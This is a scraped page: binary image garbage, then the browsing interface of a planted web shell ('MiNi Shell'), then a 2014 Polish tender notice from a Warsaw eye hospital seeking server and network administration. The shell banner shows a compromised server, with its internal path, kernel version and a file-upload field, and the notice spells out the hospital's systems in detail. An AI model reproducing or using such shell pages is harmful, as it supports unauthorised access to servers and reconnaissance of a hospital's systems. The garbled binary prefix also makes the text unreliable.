JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140314/55043-N-2014.html

<p class="kh_header"><b>Warszawa: ADMINISTROWANIE I ZARZĄDZANIE SERWERAMI ORAZ WSPÓŁPRACUJĄCYMI Z NIMI URZĄDZENIAMI SIECIOWYMI w Samodzielnym Publicznym Klinicznym Szpitalu Okulistycznym</b><br>
<b>Numer ogłoszenia: 55043 - 2014; data zamieszczenia: 14.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Kliniczny Szpital Okulistyczny , ul. Józefa Sierakowskiego 13, 03-709 Warszawa, woj. mazowieckie, tel. 022 6187979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spkso.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ADMINISTROWANIE I ZARZĄDZANIE SERWERAMI ORAZ WSPÓŁPRACUJĄCYMI Z NIMI URZĄDZENIAMI SIECIOWYMI w Samodzielnym Publicznym Klinicznym Szpitalu Okulistycznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest administrowanie i zarządzanie serwerami  oraz   
    współpracującymi z nimi urządzeniami sieciowymi eksploatowanymi w siedzibie   
    Samodzielnego Publicznego  Klinicznego Szpitala Okulistycznego w Warszawie, ul. Józefa  
    Sierakowskiego 13.  
2. Zakres usług objętych przedmiotu zamówienia  określa załącznik nr 1 do specyfikacji  
    istotnych warunków zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.51.41.00-2, 72.51.43.00-4, 72.59.00.00-7, 72.91.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
    posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli   
        przepisy prawa nakładają obowiązek ich posiadania.

    
       
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   
    zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów,  
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
    sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
    korzystania z nich przy wykonywaniu zamówienia.


3. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy  
    wykonawca złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale  
    III SIWZ, a ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami  
    określonymi w SIWZ.
4. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny  spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,            dotyczące
   
    posiadania wiedzy i doświadczenia,
        wymagania: Wykonawca winien wykazać się doświadczeniem polegającym na świadczeniu w okresie     
        ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest  
        krótszy, w tym okresie, n/wym. usług:
-	usługa wdrożenia i administracji zapory ogniowej opartej na systemie FreeBSD chroniącej wiele sieci wewnętrznych z uwzględnieniem DMZ i szyfrowanych połączeń VPN,
-	usługa wdrożenia i administracji serwera Proxy na systemie U*x z uwierzytelnianiem w domenie Active Directory,
-	usługa wdrożenia i administracji zapory ogniowej Zywall,
-	administrowania zespołem serwerów MS Windows 2008 R2 Standard i MS Windows 2012 R2 Standard w domenie Active Directory 2008 lub wyższej,
-	usługa konfiguracji i utrzymania połączeń VPN po IPSec między odległymi lokalizacjami,
-	pracy z danymi wrażliwymi,
-	usługa instalacji, konfiguracji i administracji serwerem Oracle 11g na systemie RedHat Enterprise Server 5 z wieloma instancjami bazy,
-	usługa administrowania serwerami z systemem RedHat Enterprise Server 5 x86_64,
-	usługa wdrożenia i administracji oprogramowania Arcserve BAB na systemie Linux i Windows z autoloaderem,
-	usługa utrzymania środowiska baz danych systemów InfoMedica, Apteka Eurosoft, CGM Clininet,
-	usługa instalacji i administracji serwera MS SQL 2008 i wyższych,
-	usługa instalacji i konfiguracji systemów wirtualizowanych na platformie Microsoft HyperV,
-	usługa konfiguracji, obsługi i diagnozowania sieciowego systemu antywirusowego firmy ESET (w tym konsoli),
      Warunkiem koniecznym jest załączenie dokumentów potwierdzających, że wszystkie wymienione    
      usługi były świadczone należycie.
       Wykonawca musi również udokumentować minimum 24-miesięczne doświadczenie z utrzymania w  
       ruchu serwerów stanowiących bazę systemu CGM CliniNet i InfoMedica, Apteka Eurosoft

   
    
       
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   
    zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów,  
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
    sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
    korzystania z nich przy wykonywaniu zamówienia.


3. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy  
    wykonawca złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale  
    III SIWZ, a ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami  
    określonymi w SIWZ.
4. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny  spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
   
    dysponowania odpowiednim potencjałem technicznym 
   
  
       
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   
    zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów,  
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
    sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
    korzystania z nich przy wykonywaniu zamówienia.


3. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy  
    wykonawca złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale  
    III SIWZ, a ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami  
    określonymi w SIWZ.
4. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny  spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
    
    dysponowania osobami zdolnymi do  
        wykonania zamówienia
       Zamawiający wymaga aby Wykonawca dysponował minimum dwiema osobami, które wykonywały    
       obowiązki, zgodnie z przedstawionym oświadczeniem Zamawiającego, lub legitymują się ukończeniem  
       kursu w zakresie:
-	administracji bazami danych Sybase Adaptive Server Enterprise 15.x,
-	administrowania bazą danych Oracle 11g,
-	instalacji, administrowania i zaawansowanego użytkowania, w tym tworzenia raportów, systemu  
     CGM CliniNet.
      wymagania praktyczne wobec wykonawcy:  
-	umiejętność instalacji i diagnozowania uszkodzeń okablowania kategorii 6 w tym: paneli  
     gniazdowych, gniazd, urządzeń aktywnych,
-	umiejętność obsługi, instalacji i konfiguracji sprzętu WIFI b/g/n w środowisku zabezpieczeń klasy  
           Enterprise,
-	znajomość zagadnień zasilania systemów komputerowych i doboru urządzeń podtrzymania  
     napięcia,
-	znajomość zagadnień zabezpieczania systemów komputerowych przed niewłaściwym użyciem oraz  
     włamaniem,
-	umiejętność konfiguracji i administracji zaporą ogniową Zywall,
-	umiejętność konfiguracji, obsługi i diagnozowania zestawu połączeń internetowych,
-	umiejętność instalacji, konfiguracji i administracji systemami serwerowymi: FreeBSD, RHEL ES 5,   
     MS Windows 2008 R2 Server, MS Windows 2012 R2 Server,
-	umiejętność instalacji, konfiguracji i administracji serwerami baz danych: MS SQL 2008, Oracle  
     11g, Sybase ASE 15, Postgres
-	umiejętność instalacji, konfiguracji i administracji systemami klienckimi: Linux Ubuntu,  
     MS Windows XP Professional, MS Windows 7, MS Windows 8 w środowisku domeny  
     Microsoft Active Directory 2008,
-	umiejętność wykorzystania oprogramowania Arcserve BAB i Backup Exec na platformie Linux i  
     Windows do tworzenia kopii bezpieczeństwa z kilku źródeł sieciowych,
-	umiejętność konfiguracji i administracji domeną MS Active Directory 2008 z wykorzystaniem GPO,
-	umiejętność instalacji, konfiguracji i diagnozowania usług w systemie FreeBSD i Linux: Squid Proxy          
     Server, Samba, IPFW, Apache, Postgres.
-	umiejętność zestawiania, obługi i diagnozowania układów cyfrowej rejestracji, przetwarzania i      
     przesyłania obrazu,
-	umiejętność administrowania połączonymi systemami Microsoft Windows NT/2000/XP/Vista/7/8,  
     *BSD oraz Linux,
-	umiejętność praktycznego zastosowania mechanizmów VLAN, NAT, routing, switching,
-	umiejętność łączenia odległych lokalizacji przy pomocy szyfrowanych połączeń VPN przy pomocy  
     IPSec,
-	umiejętność wykorzystania i konfiguracji protokołów SSH, SFTP, SMTP, HTTPS, POP3, IMAP4,  
     SNMP,
-	umiejętność łączenia systemów pochodzących od różnych dostawców
-	umiejętność programowania, zwłaszcza w językach skryptowych takich jak Perl, sh, awk, sed,  
     WSH, PHP,
-	znajomość sposobów i technologii przechowywania i archiwizowania danych przez systemy CGM  
     CliniNet, InfoMedica, Apteka Eurosoft,
-	umiejętność administrowania systemem CGM CliniNet i tworzenia raportów,
-	umiejętność obsługi heterogenicznego systemu wykonywania kopii bezpieczeństwa (Amanda,  
     Arcserve Backup, Backup Exec),
-	umiejętność rozwiązywania problemów w sieciach opartych o protokoły z rodziny IP,
-	umiejętność instalacji, użytkowania i diagnozowania serwerów HP serii Proliant generacji 5, 6, 7 i 8  
     oraz serwerów Fujitsu Primergy serii RX w różnych aplikacjach,
-	umiejętność instalacji i konfiguracji systemów wirtualizacyjnych i serwerów wirtualnych: VMware,  
            XEN, MS HyperV,
-	znajomość języka angielskiego pozwalająca na bezproblemową komunikację z zagranicznymi,  
     głównie anglojęzycznymi, korespondentami szpitala,
-	umiejętność interdyscyplinarnego podchodzenia do zagadnień,
-	umiejętność tworzenia i dostosowywania rozwiązań informatycznych do praktycznych wymagań  
     Zamawiającego,
-	umiejętność wsparcia Zamawiającego w rozwiązywaniu problemów z systemem SZOI, eWUŚ,
-	umiejętność pracy pod presją czasu i w warunkach stresu,
-	umiejętność konfiguracji, obsługi i diagnozowania przełączników 3Com, HP, Netgear,
-	umiejętność konfiguracji, obsługi i diagnozowania sieciowego systemu antywirusowego firmy ESET    
     (w tym konsoli),
-	wysoka kultura osobista.

  
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   
    zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów,  
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
    sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
    korzystania z nich przy wykonywaniu zamówienia.


3. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy  
    wykonawca złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale  
    III SIWZ, a ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami  
    określonymi w SIWZ.
4. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny  spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki,      
                dotyczące
   
    sytuacji ekonomicznej i finansowej.
      wymagania:  Wykonawca winien posiadać opłaconą polisę a w przypadku jej braku inny dokument  
      potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w pełnym zakresie  
      prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200.000  
      PLN.
       
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach   
    zdolnych do wykonania zamówienia  lub zdolnościach finansowych innych podmiotów,  
    niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej  
    sytuacji zobowiązany  jest udowodnić Zamawiającemu, iż będzie dysponował zasobami  
    niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  
    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres  
    korzystania z nich przy wykonywaniu zamówienia.


3. Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy  
    wykonawca złoży prawidłowo wszystkie dokumenty i oświadczenia wymienione w rozdziale  
    III SIWZ, a ponadto informacje zawarte w tych dokumentach będą zgodne z wymaganiami  
    określonymi w SIWZ.
4. Analiza złożonych wraz z ofertą dokumentów i oświadczeń będzie stanowiła podstawę do   
    oceny  spełniania warunków udziału w postępowaniu oraz do stwierdzenia braku podstaw  
    do wykluczenia wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

